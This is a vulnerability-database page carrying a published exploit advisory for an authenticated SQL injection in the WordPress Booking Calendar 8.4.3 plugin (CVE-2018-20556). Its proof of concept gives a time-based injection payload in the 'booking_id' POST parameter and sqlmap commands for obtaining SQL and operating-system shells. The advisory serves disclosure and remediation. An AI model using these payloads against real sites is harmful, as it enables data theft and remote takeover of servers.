Lucene search

K

WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection

šŸ—“ļøĀ 14 Feb 2019Ā 00:00:00Reported byĀ B0UGTypeĀ 
exploitdb
Ā exploitdb
šŸ”—Ā www.exploit-db.comšŸ‘Ā 3483Ā Views

Authenticated SQL Injection in WordPress Booking Calendar v8.4.3 plugin allows remote data reading and shell acces

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2018-20556
18 Mar 201915:43
–cvelist
Check Point Advisories
WordPress Booking Calendar Plugin SQL Injection (CVE-2018-20556)
28 Nov 202200:00
–checkpoint_advisories
CVE
CVE-2018-20556
21 Mar 201916:00
–cve
Prion
Sql injection
21 Mar 201916:00
–prion
exploitpack
WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection
14 Feb 201900:00
–exploitpack
WPVulnDB
Booking < 8.4.5.15 - SQL Injection
14 Feb 201900:00
–wpvulndb
Packet Storm
WordPress Booking Calendar 8.4.3 SQL Injection
15 Feb 201900:00
–packetstorm
NVD
CVE-2018-20556
21 Mar 201916:00
–nvd
OpenVAS
WordPress Booking Calendar Plugin < 8.4.5 SQL Injection Vulnerability
28 Mar 201900:00
–openvas
0day.today
WordPress Booking Calendar 8.4.3 Plugin - Authenticated SQL Injection Vulnerability
15 Feb 201900:00
–zdt
Rows per page
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556

#I. VULNERABILITY

Authenticated SQL Injection
 
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.

#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. 

#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: 
• Boolean based blind injection
• Error based injection
• Time based injection

7) We can perform a time based SQL injection by appending   ) AND SLEEP(100) AND (1=1   after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67

Obtaining a shell using sqlmap
-----------------------
• Obtain a SQL Shell
Sqlmap –r post-request.txt –p booking_id --sql-shell

• Obtain a Linux Shell
Sqlmap –r post-request.txt –p booking_id --os-shell

• Obtain a Windows Command Prompt
Sqlmap –r post-request.txt –p booking_id --os-cmd

#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
 
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
 
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.

#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactĀ us for a demo andĀ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Feb 2019 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS26.5
CVSS38.8
EPSS0.14676
3483
.json
Report